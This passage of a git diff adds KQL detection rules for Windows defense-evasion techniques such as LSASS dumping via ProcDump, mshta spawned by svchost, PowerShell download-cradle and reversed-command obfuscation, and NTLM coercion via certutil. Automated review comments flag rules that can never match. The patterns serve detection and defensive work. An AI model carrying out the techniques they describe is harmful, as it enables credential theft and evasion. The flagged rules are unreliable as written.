contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql
new file mode 100644
index 00000000..9b94e252
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential LethalHTA Technique Execution
+// Author: Markus Neis
+// Date: 2018-06-07
+// Level: high
+// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql
new file mode 100644
index 00000000..33f0631e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Libvlc.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected if VLC is installed in non-default locations
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
new file mode 100644
index 00000000..b393fef2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
@@ -0,0 +1,17 @@
+// Title: Potential LSASS Process Dump Via Procdump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-10-30
+// Level: high
+// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.
+This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
+LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
+Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009
+// False Positives:
+// - Unlikely, because no one should dump an lsass process memory
+// - Another tool that uses command line flags similar to ProcDump
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mm " or ProcessCommandLine contains " /mm " or ProcessCommandLine contains " –mm " or ProcessCommandLine contains " —mm " or ProcessCommandLine contains " ―mm " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " ls" or ProcessCommandLine contains " keyiso" or ProcessCommandLine contains " samss")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
new file mode 100644
index 00000000..4cdaeef5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Manage-bde.wsf Abuse To Proxy Execution
+// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: high
+// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql
new file mode 100644
index 00000000..b71d8e71
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql
@@ -0,0 +1,12 @@
+// Title: Potential Memory Dumping Activity Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of LiveKD based on PE metadata or image name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Administration and debugging activity (must be investigated)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql
new file mode 100644
index 00000000..178c730c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Meterpreter/CobaltStrike Activity
+// Author: Teymur Kheirkhabarov, Ecco, Florian Roth
+// Date: 2019-10-26
+// Level: high
+// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002
+// False Positives:
+// - Commandlines containing components like cmd accidentally
+// - Jobs and services started with cmd
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\services.exe" and (((ProcessCommandLine contains "cmd" or ProcessCommandLine contains "%COMSPEC%") and (ProcessCommandLine contains "/c" and ProcessCommandLine contains "echo" and ProcessCommandLine contains "\\pipe\\")) or (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".dll,a" and ProcessCommandLine contains "/p:")) and (not(ProcessCommandLine contains "MpCmdRun"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql
new file mode 100644
index 00000000..a7f8629d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mftrace.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use for tracing purposes
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\mftrace.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql
new file mode 100644
index 00000000..97112aef
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql
@@ -0,0 +1,10 @@
+// Title: Potential MsiExec Masquerading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-11-14
+// Level: high
+// Description: Detects the execution of msiexec.exe from an uncommon directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql
new file mode 100644
index 00000000..07571635
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql
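Review bot: In the MsiExec masquerading query, `ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe"` compares the PE original-file-name field against a value with a leading backslash; that field holds the bare file name (every other rule in this change compares it to values like `"wscript.exe"` and `"livekd.exe"`), so this branch most likely never matches and the rule silently depends on the FolderPath branch alone. A process whose image was renamed but keeps the msiexec PE metadata is exactly what the OriginalFileName branch is meant to catch, so this is a coverage loss rather than a cosmetic issue. Change it to `ProcessVersionInfoOriginalFileName =~ "msiexec.exe"`.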
@@ -0,0 +1,10 @@
+// Title: Potential NTLM Coercion Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql
new file mode 100644
index 00000000..5029f77d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: Potential Obfuscated Ordinal Call Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-" or ProcessCommandLine contains "#0" or ProcessCommandLine contains "#655" or ProcessCommandLine contains "#656") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql
new file mode 100644
index 00000000..2f8dca1e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Password Spraying Attempt Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects possible password spraying attempts using Dsacls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use of dsacls to bind to an LDAP session
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
new file mode 100644
index 00000000..ae538fc8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
@@ -0,0 +1,13 @@
+// Title: Potential PendingFileRenameOperations Tampering
+// Author: frack113
+// Date: 2023-01-27
+// Level: medium
+// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Installers and updaters may set currently in use files for rename or deletion after a reboot.
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations" and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or InitiatingProcessFolderPath contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
new file mode 100644
index 00000000..62321492
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Outlook Home Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-09
+// Level: high
+// Description: Detects potential persistence activity via outlook home page.
+An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*") and RegistryKey endswith "\\URL"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
new file mode 100644
index 00000000..c1c59c55
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
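Review bot: The Outlook Home Page filter `RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*" and RegistryKey endswith "\\URL"` can never be true: `*` is a literal character in KQL `endswith`, not a wildcard, and a single key cannot end with three different suffixes, so the rule matches nothing. The wildcards look like an untranslated pattern whose prefix parts should have become `contains`, e.g. `RegistryKey contains "\\Software\\Microsoft\\Office\\" and RegistryKey contains "\\Outlook\\WebView\\" and RegistryKey endswith "\\URL"`. The same literal-`*` translation appears in the Outlook Today rule (`"Software\\Microsoft\\Office*"`, `"\\Outlook\\Today*"`) and in the Provisioning registry rule (`"\\SOFTWARE\\Microsoft\\Provisioning\\Commands*"`), where `contains` on the prefix is likewise the intended test; the converter should probably reject or flag any emitted string that still carries a trailing `*`.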
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Outlook Today Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-10
+// Level: high
+// Description: Detects potential persistence activity via outlook today page.
+An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Stamp") or (RegistryKey endswith "\\URL" or RegistryKey endswith "\\UserDefinedUrl")) and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql
new file mode 100644
index 00000000..1dc9fe8b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Downgrade Attack
+// Author: Harish Segar (rule)
+// Date: 2020-03-20
+// Level: medium
+// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql
new file mode 100644
index 00000000..eae9983e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Execution Policy Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql
new file mode 100644
index 00000000..d1456edc
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Execution Policy Tampering - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
new file mode 100644
index 00000000..acc10fec
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential PowerShell Execution Via DLL
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-08-25
+// Level: high
+// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
+This detection assumes that PowerShell commands are passed via the CommandLine.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql
new file mode 100644
index 00000000..acc55b06
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql
@@ -0,0 +1,12 @@
+// Title: Potential PowerShell Obfuscation Via Reversed Commands
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: high
+// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql
new file mode 100644
index 00000000..e1323e69
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation
+
+DeviceFileEvents
+| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql
new file mode 100644
index 00000000..ae043a3c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Process Execution Proxy Via CL_Invocation.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
+// Date: 2020-10-14
+// Level: medium
+// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "SyncInvoke "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
new file mode 100644
index 00000000..e6ed551a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
new file mode 100644
index 00000000..97b0dabf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-08-02
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Provisioning\\Commands*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
new file mode 100644
index 00000000..9d71d4f4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: medium
+// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
new file mode 100644
index 00000000..57c07bad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
+// Author: @neu5ron
+// Date: 2019-02-07
+// Level: medium
+// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql
new file mode 100644
index 00000000..6293493e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Register_App.Vbs LOLScript Abuse
+// Author: Austin Songer @austinsonger
+// Date: 2021-11-05
+// Level: medium
+// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Other VB scripts that leverage the same starting command line flags
+
+DeviceProcessEvents
